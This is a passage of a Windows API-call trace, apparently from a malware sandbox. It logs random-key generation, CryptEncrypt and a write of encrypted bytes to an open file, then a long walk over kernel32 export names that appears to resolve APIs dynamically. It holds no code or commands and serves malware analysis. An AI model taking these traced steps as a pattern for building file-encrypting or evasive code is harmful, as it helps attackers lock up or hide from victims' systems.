| out: pbBuffer=0xfb0000) returned 1 [0082.545] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.545] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.545] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.546] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.547] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.547] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.548] CloseHandle (hObject=0x444) returned 1 [0082.548] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.548] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.549] CloseHandle (hObject=0x0) returned 0 [0082.549] CloseHandle (hObject=0x440) returned 1 [0082.549] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.550] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.550] GetTickCount () returned 0x114d1c1 [0082.550] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.550] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.550] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.550] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.550] lstrlenA (lpString="kernel32.dll") returned 12 [0082.551] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.551] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.551] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.551] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.551] lstrlenA (lpString="ADDATOMA") returned 8 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.551] lstrlenA (lpString="ADDATOMW") returned 8 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.551] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.551] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.551] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.551] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.551] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.551] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.551] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.552] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.552] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.552] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.552] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.552] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.552] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.552] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.552] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.552] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.552] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.552] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.552] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.552] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.553] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.553] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.553] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.553] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.553] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.553] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.553] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.553] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.553] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.553] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.553] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.553] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.553] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.553] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.553] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.553] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.553] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.553] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.554] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.554] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.554] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.554] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.554] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.554] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.554] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.554] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.554] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.554] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.554] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.554] lstrlenA (lpString="BEEP") returned 4 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.554] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.554] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.554] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.554] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.554] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.554] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.555] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.555] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.555] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.555] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.555] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.555] lstrlenA (lpString="CANCELIO") returned 8 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.555] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.555] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.555] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.555] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.555] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.555] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.555] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.555] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.555] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.555] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.555] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.555] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.555] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.556] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.556] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.556] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.556] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.556] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.556] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.556] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.556] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.556] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.556] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.556] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.556] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.556] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.556] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.556] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.556] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.556] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.556] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.557] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.557] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.557] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.557] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.557] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.557] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.557] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.557] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.557] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.557] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.557] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.557] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: 